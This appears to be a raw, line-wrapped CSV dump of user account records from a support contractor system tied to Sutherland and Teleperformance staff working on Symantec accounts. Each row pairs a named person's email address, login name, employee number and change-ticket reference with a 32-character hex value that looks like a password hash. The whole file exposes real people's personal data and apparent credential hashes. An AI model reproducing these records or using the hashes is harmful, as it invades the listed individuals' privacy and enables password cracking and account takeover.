tec.suth.com,Sutherland,472ee83d9aa3040ac583acee6a3dcbe6,N,<blank>,113272,Rajesh
,NULL,NULL,NULL
1c73-473a-a489-081818776e1d,"CRQ000000682567 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,c79192086fb8e17db5ce83a8195df6fc,Sanil Kumar,
<blank>,226297,Kevin,NULL,NULL,NULL
052-47ae-b314-ecae79c34d5c,<blank>,<blank>,SyedHussain_Shirazes@SUTH.COM,Sutherl
and,123adaffa6343d6c53c054fa433590b2,Hussain,<blank>,Syed_Hussain_Shirazes,Syed,
NULL,NULL,NULL
831-41d1-98cf-24653909a400,<blank>,<blank>,Syed_Farooq@SUTH.COM,Sutherland,afb0f
bf2e20537994cc55704fd6eedcf,Umar,<blank>,Syed_Umar_Farooq,Syed,NULL,NULL,NULL
10d-4a34-993d-29b4358755f4,<blank>,<blank>,TamilSelvam_E@SUTH.COM,Sutherland,d5d
ed34dd09f3139883b6760047f188f,Selvam,<blank>,Tamil_Selvam_E,Tamil,NULL,NULL,NULL
d18-49ab-b5f0-bc90438fcb59,<blank>,<blank>,TamilSudar_AM@SUTH.COM,Sutherland,29e
eaed422bd834704988740af0436fa,Sudar,<blank>,Tamil_Sudar_A_M,Tamil,NULL,NULL,NULL
3af-49c8-882f-3356db9e0a36,<blank>,<blank>,Tanveer_Munshi@SUTH.COM,Sutherland,f9
ce25fada2cb928668d1754c73ac34f,Hilal,<blank>,Tanveer_Hilal_Munshi,Tanveer,NULL,N
ULL,NULL
4925-4e28-860a-aad5b48104bb,CRQ000000260453,<blank>,tools_id@symantecsuth.com,"M
ay 29,2011 SP",9f06effd520526a737868a40ac3bb144,Prakash,<blank>,115792,Surya,NUL
L,NULL,NULL
b56-4cb7-b13e-6cd1ef0e4289,<blank>,<blank>,Taranjeet_Kambo@suth.com,Sutherland,3
bb726bc35ae2968c309b13b1b1cb167,Singh,<blank>,Taranjeet_Singh_Kambo,Taranjeet,NU
LL,NULL,NULL
0da-46a2-87fa-64416ac0d00f,<blank>,<blank>,Tarquin_Anthony@SUTH.COM,Sutherland,c
f341b0d75a53ab94bb9a579d95c1880,Hilary,<blank>,Tarquin_Hilary_Anthony,Tarquin,NU
LL,NULL,NULL
b97-4ca0-a491-a15a88210c5a,<blank>,<blank>,Tarun_Thomas@SUTH.COM,Sutherland,4e1b
932da8244213bf89671378cf0999,Jacob,<blank>,Tarun_Jacob_Thomas,Tarun,NULL,NULL,NU
LL
e4c-4ea6-9183-71cc8b22ca74,<blank>,<blank>,TebbyAnn_Mathew@SUTH.COM,Sutherland,2
47ddd9566fbe375b09da9111f22431a,Ann,<blank>,Tebby_Ann_Mathew,Tebby,NULL,NULL,NUL
L
3de-49e5-8369-2c9af6ae24cc,<blank>,<blank>,TeenaEsther_C@SUTH.COM,Sutherland,c28
f37e096aec661d1bf8d3ab693e2ad,Esther,<blank>,Teena_Esther_C,Teena,NULL,NULL,NULL
d6e-4802-9890-6e0faa82dedf,<blank>,<blank>,Tejaswi_Meshram@SUTH.COM,Sutherland,3
7ff3df5c263aa46bddd5c31b7c31a9c,Yograj,<blank>,Tejaswi_Yograj_Meshram,Tejaswi,NU
LL,NULL,NULL
35ab-45e2-b842-f6c7d44d186c,CRQ000000624227--vmd--11/04/2012,<blank>,cstrindin@s
ymantec.teleperformance.gr,Teleperformance,8f923b7bc2228b8c2afab84cc077f3a0,Stri
ndin,<blank>,223749,Christer,NULL,NULL,NULL
875-4aaf-9849-7717e1f89e87,<blank>,<blank>,Sudhir_A@SUTH.COM,Sutherland,ede07c47
e17c923667eb736141947eef,A,<blank>,Sudhir_A,Sudhir,NULL,NULL,NULL
336d-4b7b-9fbd-51c8cb93c5f9,CRQ000000315356--VMD--8/8/2011,000-000,tools_id@syma
ntec.suth.com,Sutherland,c0a80e25de03390b571ac2e5c411cc78,Nebrada,<blank>,119276
,Faith Antonio,NULL,NULL,NULL
3a0-4d95-8647-4b71f9e37f53,<blank>,<blank>,Suhail_Vohra@SUTH.COM,Sutherland,b67d
cedc760760b85bf1a1b15430e717,Mehboob,<blank>,Suhail_Mehboob_Vohra,Suhail,NULL,NU
LL,NULL
8dd-429d-9439-06f788b442a8,<blank>,<blank>,Suja_R@SUTH.COM,Sutherland,d5aef2f345
3e5f71c7a5bf13c95e9db3,R,<blank>,Suja_R,Suja,NULL,NULL,NULL
7db2-418a-8094-4a24fdd2761d,05/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.com,S
utherland,e9b435b2df5886339acdc03247248782,SitchonBraga,<blank>,104902,Armi,NULL
,NULL,NULL
149-4863-9485-d6948d7fb81b,<blank>,<blank>,Tejonidhi_VKC@SUTH.COM,Sutherland,ec4
ef348ee664e07c58b93e4c750e32e,V,<blank>,Tejonidhi_V_K_C,Tejonidhi,NULL,NULL,NULL
01ee-4ed2-aa50-7483d6c73bc3,INC213497,nam 07/13/2010,tools_id@symantec.suth.com,
Sutherland,53e5443bfab09b840054988908d81040,Ahmed,<blank>,102249,Salman,NULL,NUL
L,NULL
745-4947-b561-8f7488cdd1dd,<blank>,<blank>,Tenz_T@SUTH.COM,Sutherland,96f2b6d09e
fd904ab935dba8786862ef,Thomas,<blank>,Tenz_Thomas_T,Tenz,NULL,NULL,NULL
1db-427e-bb49-998f507726df,<blank>,<blank>,Terence_Almeida@SUTH.COM,Sutherland,4
61bb974a1286af150130cd3d1dd5e5c,Almeida,<blank>,Terence_Almeida,Terence,NULL,NUL
L,NULL
06b-4334-b1fe-fd9d10bf3b04,<blank>,2633288,tools_id@symantec.suth.com,Sutherland
,bc66237e164539e0c13a74d8509f73f9,Rakesh,<blank>,Thakker_Rakesh_P,Thakker,NULL,N
ULL,NULL
1fb7-4f8c-a677-83dbf12340ad,CRQ000000624233--vmd--11/04/2012,<blank>,spenka@syma
ntec.teleperformance.gr,Teleperformance,5e5a741b65a2028f899ded10c0464c5f,Vagenas
,<blank>,223753,Sophia,NULL,NULL,NULL
1cd-455c-9afd-7edcc1667924,<blank>,<blank>,ThammimulAnsari_N@SUTH.COM,Sutherland
,598cb4267163d31f8bfd343c522627bf,Ansari,<blank>,Thammimul_Ansari_Nizam,Thammimu
l,NULL,NULL,NULL
5cc-4008-b72d-aba89c6b6878,<blank>,<blank>,Thampi_PJ@SUTH.COM,Sutherland,e48f747
ac3a28f6a608d2f1d52d25e6e,P,<blank>,Thampi_P_J,Thampi,NULL,NULL,NULL
24f-4f8b-8bf9-9d98975af64b,<blank>,<blank>,Tharun_Elias@SUTH.COM,Sutherland,cb23
166ee5245c13c71fa2a4f6a160ad,Abraham,<blank>,Tharun_Abraham_Elias,Tharun,NULL,NU
LL,NULL
17d-4845-a3d3-eff117157872,<blank>,<blank>,Tharun_SR@SUTH.COM,Sutherland,bcba9f2
d5c9561851faa95a0c03b0a5c,S,<blank>,Tharun_S_R,Tharun,NULL,NULL,NULL
442b-47ce-aa0e-d6903868b648,PM - 8/8/2011,<blank>,tools_id@symantec.suth.com,<bl
ank>,34b2e291b5b59f815b21ce955c764d6c,Dubey,<blank>,119303,Ravi Pramod,NULL,NULL
,NULL
af8-432d-b77b-9bf54e62ce1e,<blank>,<blank>,thelmaprema_J@suth.com,Sutherland,aa3
32541a5775e9009d4ca363c9ca17c,Prema,<blank>,Thelma_Prema_Priya_Joseph,Thelma,NUL
L,NULL,NULL
ab5-4e83-9a35-f1f2c569576a,<blank>,074507,Tools_id@symantec.suth.com,Sutherland,
05d6f8142292073116db235d56bf81e7,Priya,<blank>,Theres_Priya_Tharsni_J,Theres,NUL
L,NULL,NULL
918-406b-b575-a62cacd2d62e,<blank>,<blank>,Twoty_Maplachery@SUTH.COM,Sutherland,
855f52aed4133afb3a4299c652140b34,Maplachery,<blank>,Twoty_Maplachery,Twoty,NULL,
NULL,NULL
4640-4c81-994c-1efd9e951da7,<blank>,<blank>,ioanna_kagia@teleperformance.com,CT
- 08/06/2012 - CRQ000000687730,9e79a28e96ca29061ed105d151e9c0f2,Kagia,<blank>,22
6466,Ioanna,NULL,NULL,NULL
d56-464e-9d8c-fc6a217aa8bf,<blank>,<blank>,Udit_Garg@SUTH.COM,Sutherland,de699f3
9dc3c51e748bc2401d86942f8,Garg,<blank>,Udit_Garg,Udit,NULL,NULL,NULL
5df-42a1-be6f-29fc0f535c03,<blank>,<blank>,Ujjual_K@SUTH.COM,Sutherland,f9be4bf9
1a65574c91f4bbff0953b3b9,K,<blank>,Ujjual_K,Ujjual,NULL,NULL,NULL
7b7-40fd-bebd-3a5deda4e0f6,<blank>,<blank>,Uma_R@suth.com,Sutherland,3602c167478
401509bd88b50584a6613,Maheshwari,<blank>,Uma_Maheshwari_Ramasamy,Uma,NULL,NULL,N
ULL
a3ae-428f-bb0e-64a233c61677,<blank>,<blank>,godfrey_ablao@SPI.COM,PM - 8/28/2012
- CRQ000000783724,b93abb6f27f0f5e899c02eb02ee955cf,Ablao,<blank>,229465,Godfrey
,NULL,NULL,NULL
a640-46c2-87be-300f7e6cecb9,CRQ000000653496 SP 8 May 2012,000-0000,pramila_bhatt
@symantec.suth.com,Sutherland,75adf5a366291e3921de41c9b6bb04b0,Bhatt,<blank>,224
437,Pramila,NULL,NULL,NULL
245d-46be-9cc2-de1e7db52966,<blank>,<blank>,kmourgas@symantec.teleperformance.gr
,CT - 12/09/2012 - CRQ000000800728,237e9fc7645d00b79f85d2b48937bf02,Mourgas,<bla
nk>,229977,Kyriaki,NULL,NULL,NULL
484-4180-9dc4-d449493f93f2,<blank>,<blank>,Umadevi_S@SUTH.COM,Sutherland,52b9618
cee332e3332f1e5284e80f93e,S,<blank>,Umadevi_S,Umadevi,NULL,NULL,NULL
12e-46bd-b458-cf7b241d4664,<blank>,<blank>,umar_s@suth.com,Sutherland,6d59ebb283
271a779e8661a0b0c9f42b,Farook,<blank>,Umar_Farook_S,Umar,NULL,NULL,NULL
22f-4888-acf2-bc53478e26ae,<blank>,<blank>,Sunny_Bhanushali@SUTH.COM,Sutherland,
76ab99e160a797d6c132253641d28de2,Ashok,<blank>,Sunny_Ashok_Bhanushali,Sunny,NULL
,NULL,NULL
c0b-4e41-8684-fcbcb9f9a137,<blank>,<blank>,Sunny_Palriwala@SUTH.COM,Sutherland,0
9325bd90b81306a24efc653b6fc1414,Harigopal,<blank>,Sunny_Harigopal_Palriwala,Sunn
y,NULL,NULL,NULL
e2a-4f44-a7a2-e072338de25b,<blank>,<blank>,Sunny_Jaiswal@SUTH.COM,Sutherland,ccd
c31d0aff6e8c5d0ee6b49b30e1f70,Kumar,<blank>,Sunny_Kumar_Jaiswal,Sunny,NULL,NULL,
NULL
346-433a-a5f6-e592cee55c04,<blank>,<blank>,Supriya_S@SUTH.COM,Sutherland,6d64330
6df8ca2db7b5908233a42eb13,S,<blank>,Supriya_S,Supriya,NULL,NULL,NULL
cec-4e07-be06-89d91ca104b2,<blank>,<blank>,Suraj_Murali@SUTH.COM,Sutherland,4bf2
d79f6d540264964828044bd3822c,Murali,<blank>,Suraj_Murali,Suraj,NULL,NULL,NULL
388-4761-9ff3-1470a238ad6b,<blank>,<blank>,Suraj_Makkoth@SUTH.COM,Sutherland,065
7d865b8ac1ded8451dd1436dddae3,Sudhakaran,<blank>,Suraj_Sudhakaran_Makkoth,Suraj,
NULL,NULL,NULL
8a7-497a-90f8-6ce87391b2aa,<blank>,<blank>,Suranjan_Chakma@SUTH.COM,Sutherland,4
b4713a78ea8dac0c6d69cfe150f19f2,Chakma,<blank>,Suranjan_Chakma,Suranjan,NULL,NUL
L,NULL
390-4652-b3a3-626e41140e8f,<blank>,<blank>,Sureka_M@SUTH.COM,Sutherland,1569f650
cc5ccd529a435fb71acd1937,Munusamy,<blank>,Sureka_Munusamy,Sureka,NULL,NULL,NULL
c76-4c14-bc8e-09d3a9b588ed,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,1cd673b74991469acc80550952dff8ce,S,<blank>,Surendar_S,Surendar,NULL,NULL,NULL
ccb-4fba-9e2c-d52a03030a07,<blank>,<blank>,SurendraBabu_R@SUTH.COM,Sutherland,b6
af15fde0c5523035e07378b56574c8,Babu,<blank>,Surendra_Babu_R,Surendra,NULL,NULL,N
ULL
77a-4359-8ba3-350f0559222a,<blank>,<blank>,Suresh_K5@SUTH.COM,Sutherland,cd2c33e
cae368439d8fc60594218a0dd,K,<blank>,Suresh_K,Suresh,NULL,NULL,NULL
89f0-4e2a-a09c-306df876c6db,CRQ000000460082 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,cc1ee6bd311f95d6025c4134d64ce4ac,Delos Reyes,<blank>,1
23213,Ma Cristina Alaba,NULL,NULL,NULL
09b-442b-804b-4375efe5aab4,<blank>,<blank>,SureshKumar_G2@SUTH.COM,Sutherland,35
6d9c99a25756e1b7ca240bf9e4a1ca,Kumar,<blank>,Suresh_Kumar_G,Suresh,NULL,NULL,NUL
L
4911-4788-8ca4-c68aa93298fe,CRQ000000624215--vmd--11/04/2012,<blank>,tfyllou@sym
antec.teleperformance.gr,Teleperformance,a48152e370d2e21a16c324702c2900f3,Fyllou
,<blank>,223747,Tania,NULL,NULL,NULL
b92-4905-9264-276b4a179a31,<blank>,<blank>,UmeshKumar_V@SUTH.COM,Sutherland,cb2e
f031e8dd9039c8bb6aa7b9e62926,Kumar,<blank>,Umesh_Kumar_V,Umesh,NULL,NULL,NULL
b63-433a-b7ce-abd0965dbfa9,<blank>,<blank>,Umesh_Goel@SUTH.COM,Sutherland,3a9e79
7e9249de1fcd3405b60cfb9819,Sharanpal,<blank>,Umesh_Sharanpal_Goel,Umesh,NULL,NUL
L,NULL
4ef3-45d9-95ad-dd9e428742cc,CRQ000000322958-CLNP-18/08/2011,000-0000,dionodessya
spiras_pa@symantec.suth.com,Sutherland,761b6b633797092612bca73da4d168ed,Padua,<b
lank>,119746,DionOdessyAspiras,NULL,NULL,NULL
de00-491c-8b29-5eb41b8ff8fc,CRQ000000624223--vmd--11/04/2012,<blank>,holler@syma
ntec.teleperformance.gr,Teleperformance,a7652922efc3ee10082f823d941c412f,Oller,<
blank>,223748,Helene,NULL,NULL,NULL
63c-4c2b-a441-aae1aa0a0bf0,<blank>,<blank>,Unniraj_Surendran@SUTH.COM,Sutherland
,7bcb3756ff9fe6260de0e7f633520877,Surendran,<blank>,Unniraj_Surendran,Unniraj,NU
LL,NULL,NULL
f16-4fbb-a61b-52ce544fc541,WS 19-07-2010,INC213497,UrvashiSharma_N@SUTH.COM,Suth
erland,58beab51d70125fc4bf98e73dc60aead,Sharma,<blank>,Urvashi_Sharma_N,Urvashi,
NULL,NULL,NULL
24f-4957-ab8a-80c44ad6a4ff,<blank>,<blank>,UshaBai_TA@SUTH.COM,Sutherland,b2cedd
ae790a145e973b1ca57da5d8c4,Bai,<blank>,Usha_Bai_T_A,Usha,NULL,NULL,NULL
b0e8-4b61-abf0-29fc08026f3f,CRQ000000624248--vmd--11/04/2012,<blank>,mpaivi@syma
ntec.teleperformance.gr,Teleperformance,1ae15f49d375b71f23249f1cbab68daf,Paivi,<
blank>,223758,Meittinen,NULL,NULL,NULL
f3c4-4f91-9ec8-1b9cf2137bc2,"CRQ000000682550 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,87b18773aa7fedbc029eb4b724d32d9a,Singh,<blank
>,226232,Prateek,NULL,NULL,NULL
c81-4f3d-863d-88ce19b8d37b,<blank>,<blank>,VaibhavPatingrao_Ahirarao@SUTH.COM,Su
therland,b25615a7ee2812e61631466dcc397db2,Patingrao,<blank>,Vaibhav_Patingrao_Ah
irarao,Vaibhav,NULL,NULL,NULL
15c-426f-a0b6-806c211f02ca,<blank>,<blank>,Valan_Bose@SUTH.COM,Sutherland,53ca75
6e9cb8ced5006fbe3f904c9c89,Bose,<blank>,Valan_Bose,Valan,NULL,NULL,NULL
d57-4643-889a-ce73895ab4f2,<blank>,<blank>,Valentine_Joseph@SUTH.COM,Sutherland,
14e6809a1b91a44007f0321e69fbbe71,Robert,<blank>,Valentine_Robert_Joseph,Valentin
e,NULL,NULL,NULL
f42-41f8-976b-3133c776db6a,<blank>,<blank>,Vanoji_chelladurai@suth.com,Sutherlan
d,fbc8d8a367e99618ab52dc3e4d35bb39,Chelladurai,<blank>,Vanoji_Chelladurai,Vanoji
,NULL,NULL,NULL
2c0-45b8-a2e3-28412971dd28,<blank>,<blank>,Varsha_Thulaseedharan@SUTH.COM,Suther
land,754a6c17425415ab2698b44b45bec230,Thulaseedharan,<blank>,Varsha_Thulaseedhar
an,Varsha,NULL,NULL,NULL
556-4556-9075-38d875437d04,<blank>,<blank>,Varun_M1@SUTH.COM,Sutherland,e00fb818
1281e32bf5ad0cc7ac490d95,Krishna,<blank>,Varun_Krishna_M,Varun,NULL,NULL,NULL
f0f-4ca0-a8df-069b0b70560a,<blank>,<blank>,Varun_Sumedhan@SUTH.COM,Sutherland,7d
ba553009411271ac9a264146e754bb,Sumedhan,<blank>,Varun_Sumedhan,Varun,NULL,NULL,N
ULL
601-448c-ac8a-c37d98769364,<blank>,<blank>,Varun_Gangawane@SUTH.COM,Sutherland,7
2f70ce82626084256957593d2726ca6,Suresh,<blank>,Varun_Suresh_Gangawane,Varun,NULL
,NULL,NULL
32d-447b-8bea-8e43469acdd7,<blank>,<blank>,VasanthJoe_Rajan@suth.com,Sutherland,
535c27a42c44f437ca7e49895a056e11,Joe,<blank>,Vasanth_Joe_Rajan,Vasanth,NULL,NULL
,NULL
b99-4f6d-90cd-b9520ef886d9,<blank>,<blank>,Vasanth_M2@SUTH.COM,Sutherland,e93bbb
6ec76b9d1e5a4bc7e640d8acd7,M,<blank>,Vasanth_M,Vasanth,NULL,NULL,NULL
acb-4ead-84bc-2aa266d2ea75,<blank>,<blank>,vasanth_mohan@suth.com,Sutherland,6c1
09eeda0ca62387917f0921f00846c,Mohan,<blank>,Vasanth_Mohan,Vasanth,NULL,NULL,NULL
a4a-4c74-b8ea-511f1e53eba1,<blank>,2635104,Tools_id@symantec.suth.com,Sutherland
,07d8fe690efc5f57c2e2d86a06b22582,S,<blank>,Vasanth_S_V,Vasanth,NULL,NULL,NULL
870-4046-a2d4-1b22e915674e,<blank>,<blank>,VasanthaKumar_E@SUTH.COM,Sutherland,6
5a457a206597aea8c744845a38c816f,Kumar,<blank>,Vasantha_Kumar_E,Vasantha,NULL,NUL
L,NULL
b6ff-4fa2-a8f2-b2246bde575c,<blank>,<blank>,Joshua_Garcia1@SPI.COM,PM - 6/14/201
2 - CRQ000000694452,22434473f5b210f8b6bd5db3e8b1f1eb,Garcia,<blank>,226704,Joshu
a,NULL,NULL,NULL
ee8-49ab-80e6-e4cc6fb15368,<blank>,<blank>,Vasanthasiva_RTG@SUTH.COM,Sutherland,
05f248d0f62aa4b0774441dd9551abd8,siva,<blank>,Vasantha_siva_R_T_G,Vasantha,NULL,
NULL,NULL
daf-4ad7-83d7-b2fe69427dd3,<blank>,<blank>,Vasanthi_V@SUTH.COM,Sutherland,6b2c3e
705c8aa804ee0516ceef1e4865,V,<blank>,Vasanthi_V,Vasanthi,NULL,NULL,NULL
728-441e-ae3f-af3ec86d9148,<blank>,<blank>,Vasheekar_M@SUTH.COM,Sutherland,e26ee
6d8d9fb96e7db119f28687be52a,M,<blank>,Vasheekar_M,Vasheekar,NULL,NULL,NULL
b74-4564-a9d4-7c2c194087d1,<blank>,<blank>,Vel_Murugan@suth.com,Sutherland,e840e
b8a6276e4793108d100ac6a0c99,Murugan,<blank>,Vel_Murugan,Vel,NULL,NULL,NULL
08a-43df-a611-d59bba2607d4,<blank>,<blank>,Vijay_P3@SUTH.COM,Sutherland,00b5edbd
14a0228787f555b8c62a0dc5,P,<blank>,Vijay_P,Vijay,NULL,NULL,NULL
5be-40d4-9351-38e963d3b301,<blank>,<blank>,Vijay_Gadakh@SUTH.COM,Sutherland,6b75
1ca01eb47656c92d44bf3c06fec6,Parshuram,<blank>,Vijay_Parshuram_Gadakh,Vijay,NULL
,NULL,NULL
384-418f-9f4b-cab848ba9f64,<blank>,<blank>,Vijay_Padmanaban@suth.com,Sutherland,
71096103a8edd81fe3bf5f74c7981934,Raj,<blank>,Vijay_Raj_Padmanaban,Vijay,NULL,NUL
L,NULL
624-423e-82ab-04fcaf87ef45,<blank>,<blank>,VijayShekar_S@SUTH.COM,Sutherland,605
b470009ab429d7c76fa73b2d8a05e,Shekar,<blank>,Vijay_Shekar_S,Vijay,NULL,NULL,NULL
6e8d-415e-a60e-cc76f2e64681,CRQ000000622763 SP 10 April 2012,999-999-9999,Mahesh
_C_V@symantec.suth.com,Sutherland,8d9fd96f978ba2bf2ff37677c060b77b,C V,<blank>,2
23559,Mahesh,NULL,NULL,NULL
8f7b-44f8-abcb-c6307a74d786,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,de934f3d2a426d5e75bf5a8555c3ca81,Chowdhary,<blank>,074406,Umesh,NULL,NULL
,NULL
731a-4d6c-80ad-5e74e47c03ac,CRQ000000624242--vmd--11/04/2012,<blank>,msxoinoxori
ti@symantec.teleperformance.gr,Teleperformance,802af17304535578b21d7ea67e1f96a6,
Sxoinoxoriti,<blank>,223756,Mari,NULL,NULL,NULL
382-408e-b064-42a786fdd929,<blank>,<blank>,VijayaKumar_N@SUTH.COM,Sutherland,3ae
c67f9cb87bec699d987d9ee27227d,Kumar,<blank>,Vijaya_Kumar_N,Vijaya,NULL,NULL,NULL
e094-45ff-9308-0a342da76138,CRQ000000379073 SP 31 OCT 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,dbb49b5e77145dbb184c515cc9d6def7,Roy,<blank>,121655,La
wrencePradeep,NULL,NULL,NULL
1c9-4721-9deb-b49cc1439e37,<blank>,<blank>,Vijaya_R@SUTH.COM,Sutherland,c5f816b4
fdf7130cba2f1e26480c5aa0,R,<blank>,Vijaya_R,Vijaya,NULL,NULL,NULL
6be5-41b2-9505-16bc3a2dc3bf,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,85fe08964afecfbe6fc6d505ad9ecc60,Woodward,<blank>,085710,Aaron,NULL,NULL,NULL
0aac-4213-af67-8d41231cb88b,CRQ000000653499 SP 8 May 2012,000-0000,ayyammal_sola
ghar@symantec.suth.com,Sutherland,f4e7b68d74df39850e8cd9b9ad9d9ee1,Solaghar ,<bl
ank>,224438,Ayyammal,NULL,NULL,NULL
714-48fd-85c2-8c1a2a79bc86,<blank>,<blank>,Vijayan_C@SUTH.COM,Sutherland,d520162
2e4529fa908e75ac29dfae55f,Chandrakumar,<blank>,Vijayan_Chandrakumar,Vijayan,NULL
,NULL,NULL
68e-4996-bff6-633823f36fae,<blank>,<blank>,Vijayanand_KV@SUTH.COM,Sutherland,efe
b62c6aed9e0646899cd3e3139fcaa,K,<blank>,Vijayanand_K_V,Vijayanand,NULL,NULL,NULL
046-4848-a681-fdb94d38c1f1,<blank>,<blank>,Vijayasekaran_R@SUTH.COM,Sutherland,0
6d25f8afc0ab675e768bee3c2dc6616,R,<blank>,Vijayasekaran_R,Vijayasekaran,NULL,NUL
L,NULL
9bd-4bd3-a427-8f1337fe191f,<blank>,<blank>,Vijesh_C@SUTH.COM,Sutherland,49cbd15f
5ca992c0babc0a6dbda0cb06,C,<blank>,Vijesh_C,Vijesh,NULL,NULL,NULL
5667-4650-8807-d5f701b4d6d8,<blank>,<blank>,mbjerkelund@symantec.teleperformance
.gr,CT - 12/09/2012 - CRQ000000801487,a08d9d7e0330f4b657087c4114b5284d,Bjerkelun
d,<blank>,229995,Magdalena,NULL,NULL,NULL
2f84-4a84-89f3-dabcb0cad267,"CRQ000000669881 CLNP May 23,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,1cbaeb506ea66d7025910e413e57b8ae,Ashfaque,<bla
nk>,225902,Chougle,NULL,NULL,NULL
f40-49eb-9bc3-1c48395d6bac,<blank>,<blank>,Velukannan_T@SUTH.COM,Sutherland,a440
fdb8cb8769c69ec31a769fcde8fa,T,<blank>,Velukannan_T,Velukannan,NULL,NULL,NULL
c976-44dc-b8b8-410dc672eb69,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,b983b1c4f78df6d6c63d69d7cff29a4e,Swamy,<blank>,nsarat_swamy_cc,NSarat,NUL
L,NULL,NULL
e7b-40ef-bb24-4f48049615ca,<blank>,<blank>,Venkatesan_D@suth.com,Sutherland,589c
28b2bd23282cba480b1275e76da9,D,<blank>,Venkatesan_D,Venkatesan,NULL,NULL,NULL
40a6-4e82-b960-58245f5cf89a,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,c8cfdafc006e2ea1e57a487293188075,Burson,<blank>,085731,Kate,NULL,NULL,NULL
8a0-4eb6-95ba-9f14734d18ba,<blank>,<blank>,bvenkatesh@suth.com,Sutherland,b7dc4b
75fba086aacf62aebbaa76f661,Bhattiprolue,<blank>,Venkatesh_Bhattiprolue,Venkatesh
,NULL,NULL,NULL
e98-4de6-b710-a792085acb42,<blank>,<blank>,RVenkat1@suth.com,Sutherland,073c68b2
e586487405051593a4f5cb1b,Rao,<blank>,Venkatesh_Rao,Venkatesh,NULL,NULL,NULL
18a-4133-95bd-e3621d18610d,<blank>,<blank>,Venkatesh_S@SUTH.COM,Sutherland,bb844
2381fe2b73a14c49f5632811b4c,S,<blank>,Venkatesh_S,Venkatesh,NULL,NULL,NULL
bd1a-4ee8-9252-420b165b4912,"CRQ000000602142 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,231b75bb3ad6f786aa98ac7c9925cad1,Kasilag,<blank
>,222566,EarlClyde,NULL,NULL,NULL
af00-4ff0-be2c-0622f77b016f,<blank>,<blank>,zdarla@symantec.teleperformance.gr,C
T - 12/09/2012 - CRQ000000801490,64932f7871762db58bbfb12c401297a4,Darla,<blank>,
229996,Zoe,NULL,NULL,NULL
d5c-448c-9079-7d650e4a27bf,<blank>,<blank>,Venkatraman_C@SUTH.COM,Sutherland,fb3
57dbb2ae5971862bea2174523b435,C,<blank>,Venkatraman_C,Venkatraman,NULL,NULL,NULL
136-4ef6-9962-f2128479dff8,WS 19-07-2010,INC213497,avijay@suth.com,Sutherland,e8
897ec3b231b263c82a82f736e685fa,Angamuthu,<blank>,Vijay_Angamuthu,Vijay,NULL,NULL
,NULL
6be-4e03-b92e-7f6fc40d1221,<blank>,<blank>,VijayBaskar_R@SUTH.COM,Sutherland,9de
17a72c95bbe26280ed8dddf19b3e1,Baskar,<blank>,Vijay_Baskar_Rajaram,Vijay,NULL,NUL
L,NULL
1442-4bdd-850b-27ef37482342,CRQ000000624230--vmd--11/04/2012,<blank>,ipanagopoul
os@symantec.teleperformance.gr,Teleperformance,ea5312260ce755d0b2562f458af088fc,
Panagopoulos,<blank>,223752,Ioannis,NULL,NULL,NULL
f82-431e-90d2-4f729e7b148f,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,5b93157a76307b0e8def9d979424f784,Jadhav,<blank>,Vijay_Jadhav_N,Vijay,NULL,NULL,
NULL
d61-4a25-8a74-7b2f17d84330,<blank>,<blank>,VijayKrishnan_Nair@SUTH.COM,Sutherlan
d,1ca8edf9d72bb53366117974944faa80,Krishnan,<blank>,Vijay_Krishnan_Nair,Vijay,NU
LL,NULL,NULL
d97-4101-af89-554b9c3ab5bd,<blank>,<blank>,BDVikas@suth.com,Sutherland,5d5c53945
d67a7cde33b6399b8863e50,Dattatreya,<blank>,Vikas_Dattatreya_Bhave,Vikas,NULL,NUL
L,NULL
0bf-4663-824a-1a956df55d5b,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,Su
therland,c5e22b133a5b246eef0e4c409a66072a,Gokuldas,<blank>,Vikram_Gokuldas_Pai,V
ikram,NULL,NULL,NULL
729-45f8-beca-a42920136d10,<blank>,<blank>,vikram_kamalanathan@suth.com,Sutherla
nd,9e46206c2d924ec40ea12c9f8879f74d,Singh,<blank>,Vikram_Singh_Kamalanathan,Vikr
am,NULL,NULL,NULL
82b-4851-9427-95190c5d3a54,<blank>,<blank>,Vikram_Virdi@SUTH.COM,Sutherland,1af3
61e0fb940a19c2cd823f8b17f3c9,Singh,<blank>,Vikram_Singh_Virdi,Vikram,NULL,NULL,N
ULL
84e-413f-a5d8-73e38df017ce,<blank>,<blank>,Vikram_Desai@SUTH.COM,Sutherland,b92c
04cfcd3c0a97f66b4b1e842d76c5,Vikas,<blank>,Vikram_Vikas_Desai,Vikram,NULL,NULL,N
ULL
d6b-41dd-aff7-f635f348177c,<blank>,<blank>,Vikrant_More@SUTH.COM,Sutherland,3a3b
d92c73751d539f57016458d0f2f0,Rajan,<blank>,Vikrant_Rajan_More,Vikrant,NULL,NULL,
NULL
50b-4ef0-9fe0-0e91b324d036,<blank>,<blank>,Vimal_Sanghavi@Suth.com,Sutherland,b7
11236ad62416087780afec713f51b9,Ashok,<blank>,Vimal_Ashok_Sanghavi,Vimal,NULL,NUL
L,NULL
9e4-42a4-8f10-ddedd14a8d47,<blank>,<blank>,Vinay_BS@SUTH.COM,Sutherland,aaede761
21eb452ebba8295f3434ef7f,Chandran,<blank>,Vinay_Chandran_B_S,Vinay,NULL,NULL,NUL
L
80c-4759-a2a6-09a66581a472,<blank>,<blank>,Vinay_Dharamdas@suth.com,Sutherland,f
5f900e385d4d1d95adb772815c5d4df,Dharamdas,<blank>,Vinay_Dharamdas_Vennomgole,Vin
ay,NULL,NULL,NULL
054-4103-8f65-4a29075d119d,<blank>,<blank>,Vinay_Dubey@SUTH.COM,Sutherland,d0f1e
de4adad139d08b62fb48ecfc85b,Kumar,<blank>,Vinay_Kumar_Dubey,Vinay,NULL,NULL,NULL
